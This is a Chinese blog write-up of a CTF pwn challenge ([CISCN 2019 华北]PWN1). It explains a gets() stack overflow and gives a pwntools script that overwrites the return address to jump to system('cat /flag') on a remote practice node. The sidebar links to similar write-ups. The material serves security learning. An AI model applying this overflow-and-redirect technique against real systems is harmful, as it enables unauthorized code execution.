NSSCTF刷题笔记pwn3——[CISCN 2019华北]PWN1

已于 2024-01-19 19:54:32 修改
阅读量428 收藏 11
点赞数 9
分类专栏: pwn 文章标签: 笔记
于 2024-01-19 19:54:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135705797
版权

使用ida打开,这里要判断v2要等于11.28125,但是v2压根就不能被改变

gets是栈溢出漏洞的常客了,因为他不会限制我们输入多少内容

我们直接覆盖掉返回的地址,返回的地址我们填从result=system("cat /flag")开始即可

差不多就是这里: 0x4006be

这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节

知道了这些后,开始写exp

from pwn import *

p = remote("node4.anna.nssctf.cn",28318)

payload = b"a" * 0x30 + b"a" * 8 + p64(0x4006be)

p.sendline(payload)

p.interactive()

qq_45692883
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn3记录
weixin_55190422的博客
11-08 82
IDA里面看一下main函数,发现有个系统函数读取flag.F5反编译一下 v2=11.28125同样也可以获取flag。所以这个目就是修改V2。 checksec一下 0x4是存储v2的地址, 0x30是开始存储V1的地址。因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 有两个比较指令,双击进去 这个就是11.28125的十六进制值。所以exp: ...
CTF_论剑场 pwn3
W3rsn
04-16 295
先把附件下载下来,然后checksec checksec pwn3 然后IDA64打开 read函数存在栈溢出,然后重新里还有一个getshell函数。所以控制程序运行流程使它跳转到getshell函数就可以得到flag from pwn import * context(arch="amd64", os="linux") p = remote("114.116.54.89",...
NSSCTF笔记pwn7——[watevrCTF 2019]Voting Machine 1
qq_45692883的博客
02-02 397
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
NSSCTF笔记pwn6——[NISACTF 2022]ezstack
qq_45692883的博客
02-02 222
这个shell会使用system函数打印一串内容,并且发现我们读入的数据大于buf的大小,存在栈溢出。栈溢出,system函数,/bin/sh字符串,那么万事已经具备了,开始写脚本。按下shift+12,在字符串界面找到/bin/sh。用ida打开,有一个shell函数。
NSSCTF笔记pwn4——[NISACTF 2022]ReorPwn?
qq_45692883的博客
01-30 163
下载好文件,直接运行,发现就可以执行命令了。那这里介绍一个可以颠倒字符串的命令:rev。那么很简单就做出来了。
NSSCTF笔记pwn9——[GFCTF 2021]where_is_shell
qq_45692883的博客
02-02 432
然后首先要注意这是64位的程序,参数会依次存放在rdi,rsi,rdx,rcx,r8,r9这6个寄存器中,多的存放在栈中。$0也是可以被当做shell执行的,因此我们去掉前面一位,取出shell的地址是0x400541。然后我们还需要一个ret的地址,否则本地能打通,远程打不通。存在一个提示函数,代码报红,说明存在问,看一下机械码。有system函数,但是不存在/bin/sh字符串。可以看到\x24 \x30对应的是$0。main函数,存在很明显的栈溢出。找到地址 0x4005e3。
NSSCTF笔记pwn2——[LitCTF 2023]只需要nc一下~
qq_45692883的博客
01-19 360
目的附件都没给,只留下这段提示,那么拿出nc连接试试看,是不是真的有那么简单。有点像在玩躲猫猫,这个123456是假的,根据提示flag应该藏在环境变量中。/etc/profile,不过cat之后会跳出,不懂什么情况,是文件太大了吗。按理来说我们也可以查看环境变量的配置文件。也可以使用env命令查看所有的环境变量。我们可以echo $FLAG。这的考点是环境变量。
NSSCTF笔记pwn5——[BJDCTF 2020]babystack2.0
qq_45692883的博客
01-30 272
在gdb中,我们可以看到栈溢出的大小是16+8,24字节。使用gdb动态调试,找到栈溢出的大小,ida提示是4。在read中参数nbytes是一个无符号的整数。那么即可为我们写入255个数据,就完成栈溢出。我们发现对比时nbytes是一个整数。估计栈溢出就发生在第二个参数传入时。首先问我们要一个数字,要小于10。而我们最多只能写入9个长度的数据。-1在无符号数中代表255。然后再问我们要一个值。
NSSCTF笔记pwn1——[SWPUCTF 2021 新生赛]gift_pwn
qq_45692883的博客
01-19 601
最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了。ida有帮我们识别出来,距离rbp 16字节,我们要再加上我们的8个字节。首先找到我们要返回的gift的地址 0x4005b6。有一个栈溢出,和一个调用系统bash的命令。_system可以调用系统命令。把附件下载下来拖入ida运行。vuln可能存在漏洞的函数。不过要注意这是64位的程序。直接发送获取shell即可。gift目中的主要函数。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。解链接:...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
随心笔记,第六更
leen的博客
06-13 535
今天给大家分享的是使用idea 将xml转为JavaBean,并且取其中的数据和其他的数据进行交互。
Python学习笔记11 -- 细碎内容
m0_71291382的博客
06-12 258
记录一些琐碎点,包括如何注释、变量常量说明、字符串拼接的三种方法及转义字符的简单说明
MySQL数据库笔记(二)
2301_78671299的博客
06-18 634
操作数据对象。接受参数返回一个结果。只对一行进行变换。每行返回一个结果。可以嵌套。参数可以是一列或一个值。聚合函数作用于一组数据,并对一组数据返回一个值。子查询指一个查询语句嵌套在另一个查询语句内部的查询。多表查询,也称为关联查询,指两个或更多个表一起完成查询操作。前提条件:这些一起查询的表之间是有关系的(一对一、一对多),它们之间一定是有关联字段,这个关联字段可能建立外键,也可能没有建立外键。比如:员工表和部门表,这两个表依靠“部门编号”进行关联。
libspice源文件笔记
最新发布
cai742925624的专栏
06-18 70
libspice源文件笔记
软件安全实验二——pwn
09-12
关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值